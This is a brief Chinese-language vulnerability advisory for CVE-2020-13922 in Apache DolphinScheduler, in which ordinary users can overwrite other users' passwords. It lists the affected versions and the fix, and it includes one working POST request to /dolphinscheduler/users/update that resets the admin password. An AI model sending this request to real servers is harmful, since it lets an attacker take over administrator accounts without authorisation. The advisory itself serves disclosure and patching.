Apache DolphinScheduler权限覆盖漏洞(CVE-2020-13922)

2022年1月6日01:04:58评论93 views字数 440阅读1分28秒阅读模式

漏洞描述

发现的漏洞是任何租户下的普通用户都可以通过以下方式覆盖其他用户的密码
api interface /dolphinscheduler/users/update

受影响版本
Apache DolphinScheduler = 1.2.0、1.2.1、1.3.1

安全版本
Apache DolphinScheduler >= 1.3.2

1 2	POST /dolphinscheduler/users/update userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=&id=1

建议用户将 Apache DolphinScheduler 升级到安全版本。

FROM :ol4three.com | Author:ol4three

本文由 admin 发表于 2022年1月6日01:04:58
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
Apache DolphinScheduler权限覆盖漏洞(CVE-2020-13922)https://cn-sec.com/archives/720956.html